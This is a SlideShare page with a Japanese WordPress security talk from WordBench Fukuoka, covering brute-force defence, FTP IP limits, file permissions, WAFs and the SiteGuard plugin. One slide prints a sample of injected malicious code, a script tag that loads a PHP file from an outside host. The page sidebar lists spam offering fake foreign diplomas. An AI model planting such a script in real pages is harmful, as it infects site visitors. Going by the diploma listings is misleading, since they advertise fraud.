Home
Explore
Submit Search
Upload
Login
Signup
Advertisement
Check these out next
Rust と Wasmの現実
ShogoTagami1
第4回鹿児島node.jsの会資料_内村
Koichi Uchimura
JavaプログラマのためのWebSocket概要
Shumpei Shiraishi
RVM with Server Environment
Yukimitsu Izawa
Play_using_Proxy
Kunio Miyamoto, Ph.D.
WordBench Nagoya 2015年3月勉強会
Kei Nomura
イントラの中のWiki
kan
Traffix Jam インストール方法
kohiharu
1
of
38
Top clipped slide
Word benchfukuoka
Mar. 9, 2015
•
0 likes
1 likes
×
Be the first to like this
Show More
•
3,719 views
views
×
Total views
0
On Slideshare
0
From embeds
0
Number of embeds
0
Download Now
Download to read offline
Report
Internet
WordBenchFukuoka in FUKUOKA MEETUP COMMUNITY
Junji Manno
Follow
Advertisement
Advertisement
Advertisement
Recommended
Firefox FAQ
dynamis
2.3K views
•
141 slides
OSC 2010 Tokyo/Fall MSセッション
Masaki Takeda
1.3K views
•
22 slides
WordPress 3.6 世告げの姫と新機能
Odyssey Eightbit
1.7K views
•
65 slides
NetCommonsユーザカンファレンス2016 オープンソース・ワークショップ
Mitsuru Mutaguchi
1K views
•
12 slides
Firefox OSアプリの概要@gunma.web
Hayato Hiratori
999 views
•
28 slides
HTTP/2入門
渉 米須
8.9K views
•
45 slides
More Related Content
Slideshows for you
(20)
Rust と Wasmの現実
ShogoTagami1
•
170 views
第4回鹿児島node.jsの会資料_内村
Koichi Uchimura
•
1.5K views
JavaプログラマのためのWebSocket概要
Shumpei Shiraishi
•
7.2K views
RVM with Server Environment
Yukimitsu Izawa
•
2K views
Play_using_Proxy
Kunio Miyamoto, Ph.D.
•
564 views
WordBench Nagoya 2015年3月勉強会
Kei Nomura
•
4.7K views
イントラの中のWiki
kan
•
1.5K views
Traffix Jam インストール方法
kohiharu
•
1.6K views
SubversionとSugarsync
Hidenori Goto
•
1.2K views
Openwhisk と chatbot
幹夫 賀谷
•
381 views
PlayFramework 2.0 Javaと WebSocketでつくる リアルタイムMVC Webアプリケーション
Kazuhiro Hara
•
12.1K views
Packerで自動化
Shintaro Hasunuma
•
1.3K views
Nagios大好きさんが喋るzabbixとAWS連携の話
Takayuki Saito
•
5.5K views
Flash Playerの作り方
Yu Kobayashi
•
2.9K views
EWD 3トレーニングコース#6 ewd-xpressアプリ開始時に何が起こるか
Kiyoshi Sawada
•
146 views
バージョン管理#01 -Subversion編-
hakoika-itwg
•
3.1K views
Java on Azure
Yoshihiro Yamada
•
1.1K views
はじめてのSubversion(サブバージョン)
西畑 一馬
•
3K views
Open whisk slackinvite - public
Takehiko Amano
•
405 views
WebSocketプロトコル
Daniel Perez
•
14.3K views
Similar to Word benchfukuoka
(20)
まだFTPで消耗してるの? Wordmoveではじめる 異次元のデータ転送
Sou Lab
•
2.4K views
WordCafe fuji vol.2
Endoh Shingo
•
609 views
WordPressとリスク管理 at 第42回 WordBench大阪
Kitani Kimiya
•
1.4K views
WordCafe Fuji vol.1
Endoh Shingo
•
608 views
Secret of Firefox
dynamis
•
28.2K views
WordBeach 2012
Masaki Takeda
•
580 views
WordCamp Haneda 2019 WordPress初心者のためのサイト運営虎の巻 #wchaneda
Hidekazu Ishikawa
•
1.6K views
Lesson01
MRI
•
37.5K views
中級者のためのWordPress講座[第1回]既存のプラグインを組み合わせることでWEBサービスを作ってみよう!
switch3000
•
1.2K views
OWASP WordPressセキュリティ実装ガイドライン (セキュアなWordPressの構築ハンズオン手順書)
OWASP Nagoya
•
4.8K views
Webサーバの基礎知識【編集済み】
Kikunaga Taishi
•
3K views
WordPress初心者のためのサイト運営虎の巻
Hidekazu Ishikawa
•
14.4K views
WordPressで複数のプラグインをまとめて一気にインストールする方法
Masahiro Nakashima
•
2.6K views
PHP With Windows binary
Masahiko Sakamoto
•
6.7K views
簡単!自動バックアップ設定でWordPressを安心運用
Hidekazu Ishikawa
•
844 views
Web2.0 講演スライド 2008/2/26
kishida4slideshare
•
576 views
Kubernetes環境で実現するWebアプリケーションセキュリティ
NGINX, Inc.
•
161 views
dockerでImmutable InfrastructureなWordPressを考える
GMOインターネット
•
6.6K views
Firefox OS の Wi-Fi 機能改善
Honma Masashi
•
1.1K views
Vagrantと網元で開発環境を作ってみよう
Takuma Morikawa
•
4.3K views
Advertisement
More from Junji Manno
(6)
Jbug福岡#3 Backlogを活用したシェアオフィス管理
Junji Manno
•
1.6K views
Wordbench fukuoka
Junji Manno
•
4K views
Wordbench fukuoka
Junji Manno
•
1.9K views
20120427西区勉強会
Junji Manno
•
1.5K views
Web storage
Junji Manno
•
876 views
Word Camp Fukuoka 2010
Junji Manno
•
1.3K views
Recently uploaded
(20)
#国外文凭办理Camosun学位证成绩单
08e9d7528d5drman
•
3 views
#国外留学文凭购买McGill假毕业证书
fc2c0f2b1mymailol
•
2 views
ALGYANでChatGPTとの旅
Jingun Jung
•
272 views
#国外文凭办理UA学位证成绩单
losapab511ockdiaom
•
2 views
#学位证靠谱办LU文凭证书全套
buxvunsvjiujzternetk
•
2 views
#国外文凭办理UH学位证成绩单
losapab511ockdiaom
•
2 views
#国外文凭办理佩斯学位证成绩单
losapab511ockdiaom
•
2 views
★可查可存档〖制作戴尔豪斯大学文凭证书毕业证〗
mmmm282537
•
2 views
#国外文凭办理Brandon学位证成绩单
ronime8068zatcom
•
2 views
#国外文凭办理SU学位证成绩单
losapab511ockdiaom
•
2 views
如何购买文凭《华威大学毕业证成绩单》
tnopob
•
3 views
#国外文凭办理Duke学位证成绩单
losapab511ockdiaom
•
2 views
#国外文凭办理Lakehead学位证成绩单
ronime8068zatcom
•
2 views
Online Doctor.pdf
MrThomasSsarah
•
3 views
澳洲学历堪培拉毕业证书独家定制
JhhhfGffh
•
2 views
#国外文凭办理uOttawa学位证成绩单
ronime8068zatcom
•
2 views
#学位证靠谱办Leeds文凭证书全套
76p522i4nqmocom
•
2 views
【NGINXセミナー】API ゲートウェイとしてのNGINX Plus活用方法
NGINX, Inc.
•
13 views
#学位证靠谱办Quebec文凭证书全套
76p522i4nqmocom
•
2 views
#国外文凭办理York U学位证成绩单
ronime8068zatcom
•
2 views
Advertisement
Word benchfukuoka
WordBench Fukuoka もうそろそろ4.2ベータ1回目くらいかな? 2015年3月7日
WordPressのセキュリティについて 考える
万野 潤二 GMOペパボ 糸島芸農 福岡移住計画
WordPressのセキュリティについて WordPressの更新 サーバーの脆弱性 ユーザー名とパスワード FTPアクセス制限 WAFの導入 ファイルパーミッション プラグインの利用
何が起こっているの? コメント・ピンバックスパム。かつ対象ページにア クセスされるとサーバー負荷に.. サイトとは関係のないサイトへのリダイレクト (URL書き換え)しかもサーチエンジン経由のみ アクセスされるたびに外部スクリプトが実行されて いる.. メール大量配信の踏み台に.. サイトが表示されなくなる。ここで はじめて気づく..
コードを埋め込まれた例 <!--5va837--><script type="text/javascript" src="http://abcdefg.pl/wp- content/themes/twentyfourteen/ftuhdw7q.php?id=1766503"></ script><!--/5va837-->
http://www.google.com/safebrowsing/diagnostic?site=http://example.com
何で起こっているの? ブルート・フォース・アタック 総当たり・辞書による攻撃 FTPアカウント剥奪 マルウェアに感染し、第三者から不正にFTP接続されファイ ルの設置、改ざんが行われる
何で起こっているの? プラグインの脆弱性 最近だとRevSliderプラグインを狙ったマルウェアが10万サイトを 汚染 http://blog.sucuri.net/2014/12/soaksoak-malware-compromises- 100000-wordpress-websites.html その他にもJoomla,WordPressのプラグインなどに使用されている ofc_upload_image.phpの脆弱性 提供元は信頼を失うことにも.. また、使用していないテーマ・プラグインは要削除。
WordPressの更新 WordPressの自動更新は有効に。 Update Control(プラグイン) 自動バックグラウンド更新の設定を簡単に設定す ることができる。
サーバーの脆弱性 信頼できるサーバー会社、サービスを利用する。 セキュリティニュース、IPA、JVN などのトピックを チェック。
ユーザー名とパスワード
ユーザー名は”admin”であっては ならない by HostGator.com Photo by
http://www.pakutaso.com/
ユーザー名 ブルート・フォース・アタックの標的 •管理者権限剥奪、権限悪用、個人情報漏洩... 攻撃されやすいユーザー名 •admin, test,123456, demo,
administrator, root, webmaster...
ユーザー名 作成されたアカウントadminは削除できない →他の管理者アカウントを作成し削除
パスワード 安易なパスワードを設定しない。
FTPアクセス制限 万一FTPアカウント情報が第三者に渡ったら。格好の 侵入経路となり、ファイルの改ざん、設置し放題。 →そもそもFTP接続する場所は限定されるはずなの で、IPアドレスによる制限(.ftpaccess)を実施。 <Limit ALL> Order Allow,Deny Allow
from 111.111.111.111 # home Allow from 123.123.123.123 # office Deny from all </Limit>
WAFの導入 SQLインジェクションやクロスサイトスクリプティング など、Webアプリケーション上の脆弱性をカバーする装 置。 WAFは通常のファイアウォールと同様にすべてのHTTP/ HTTPSトラフィックを中継し、通信の内容を精査する。 GNUライセンスの下で公開されているオープンソースの Webアプリケーションファイアウォール。
パーミッション WordPressの安全性を高める ファイルパーミッション http://goo.gl/wF1Wpj 600 -rw-------
/home/user/wp-config.php 604 -rw----r-- /home/user/cgi-bin/.htaccess 600 -rw------- /home/user/cgi-bin/php.ini 711 -rwx--x--x /home/user/cgi-bin/php.cgi 100 ---x------ /home/user/cgi-bin/php5.cgi ※ wp-config 400 wp-admin/install.php 000
プラグインの導入
SiteGuard WP Plugin
SiteGuard WP Plugin SiteGuard
WP Pluginは、WordPressにインストールするだ けで、セキュリティを向上させることができます。 SiteGurad WP Pluginは、管理ページとログインに関する攻 撃からの防御に特化したセキュリティプラグインです。 WAF ( SiteGuard Lite )の除外ルールを作成する機能もあり ます。( 使用するにはWAFがWebサーバにインストール されている必要があります )
管理ページアクセス制限 ログインページ変更 画像認証 ログイン詳細エラーメッセー ジの無効化 ログインロック ログインアラート フェールワンス ピンバック無効化 更新通知 WAFチューニングサポー ト SiteGuard WP Plugin
SiteGuard WP Plugin 管理ページアクセス制限 アクセス元のIPアドレスによる 制限を実施。 アクセス元IPアドレスが複数、 不定期に更新される場合。 会員向けサイト(複数のユー ザ)には利用し難い。
SiteGuard WP Plugin ログインページ変更 そもそもブルートフォース、リス ト攻撃の標的は
wp-login.php なの で、ページそのものを変更する ことが有効。 初期値は「login_(5桁の乱数)」で すが、好みの名前に変更するこ とができる。 例 http://manno.jp/login_38521
SiteGuard WP Plugin 画像認証 ログインページ、コメント投 稿に画像認証(ひらがな、英 数字)を追加します。
SiteGuard WP Plugin ログイン詳細エラーメッセー ジの無効化 ログインエラーしたときの詳 細なエラーメッセージに変え て、単一のメッセージを返し ます。
SiteGuard WP Plugin ログインロック ログイン失敗を繰り返す接 続元を一定期間ロックしま す。 似た機能を持つプラグイン Simple
Login Lockdown http:// wordpress.org/extend/plugins/
SiteGuard WP Plugin ログインアラート ログインがあったことを、 メールで通知します。
SiteGuard WP Plugin フェールワンス ユーザ名、パスワードが正 しい入力を行っても、ログ インを一回失敗します。
SiteGuard WP Plugin ピンバック無効化 ピンバックの悪用(スパム) を防ぎます。
SiteGuard WP Plugin 更新通知 WordPress、プラグイン、 テーマの更新を、メールで 通知
SiteGuard WP Plugin WAFチューニングサポート webサーバーにJP-Secure製の WAF
( SiteGuard Lite ) が導入 されている場合利用可。 誤検知されたシグネチャの 除外リストを作成する。
WordPress Codex WordPressの安全性を高める http://goo.gl/qxN5Qx JP Secure SiteGuard
WP Plugin http://goo.gl/w4ORQD JVN 脆弱性対策情報データベース http://jvndb.jvn.jp/
Advertisement